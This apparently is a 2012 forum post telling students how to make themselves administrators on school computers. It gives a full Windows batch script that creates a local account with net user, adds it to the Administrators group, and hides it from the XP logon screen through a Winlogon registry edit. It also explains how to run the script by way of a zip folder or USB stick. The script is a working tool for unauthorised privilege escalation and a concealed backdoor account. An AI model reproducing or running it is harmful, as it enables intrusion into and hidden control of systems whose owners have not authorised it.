1 How to become a admin at school 13/6/2012, 1:55 pm
vFuzR
When opened Type a Username:
then Enter type a password...
then leave the next one blank...
then type *Administrators
enter then answer the (Y,N)(Yes,No)
Y
N
enter... Enter
When done Log off and log on your new account...
when you save it as .bat and send to .zip if you can't Open it you will have to put it on Memory Stick (USB)
Also normal the computers are
Username:
Password:
.......MYSCHOOL.[V] <drop down arrow
.......[Login].[Restart].[Shutdown]
When you Type your new account Username and Password and it don't Work.
Click the Drop down arrow and change it to your computer name or what ever domain's come up.
Here is the text
- Spoiler:
- @ECHO off
TITLE Admin account creator (LOKI / VOIDE.ORG)
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo \
GOTO %AC_PART%
:001
SET /P AC_NAME=[*] Acount name? :
cls
SET AC_PART=002
GOTO HEADER
:002
SET /P AC_PASS=[*] Acount password? :
cls
SET AC_PART=003
GOTO HEADER
:003
SET /P AC_COMMENT=[*] Acount Comment? :
cls
SET AC_PART=004
GOTO HEADER
:004
ECHO [* The following groups are available on the machine.
ECHO.
net localgroup | find "*"
ECHO.
SET /P AC_GROUP=[*] Group? :
cls
SET AC_PART=005
GOTO HEADER
:005
SET /P AC_OK=[*] Creating acount now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause
:0051
cls
SET AC_PART=006
GOTO HEADER
:006
SET /P AC_HIDE=[*] Do you want to hide the acount from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00 %TEMP%\addregistry.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]%TEMP%\addregistry.reg
echo "%AC_NAME%"=dword:00000000%TEMP%\addregistry.reg
Regedit /s %TEMP%\addregistry.reg
Del %TEMP%\addregistry.reg
:END
ECHO.
pause
^
Copy and Past into Notepad Save as .Bat
then goto My Document's Right click it and go ~Send to >> Compressed zip (.zip) File
then open the compressed zip folder click your bat file and Create your account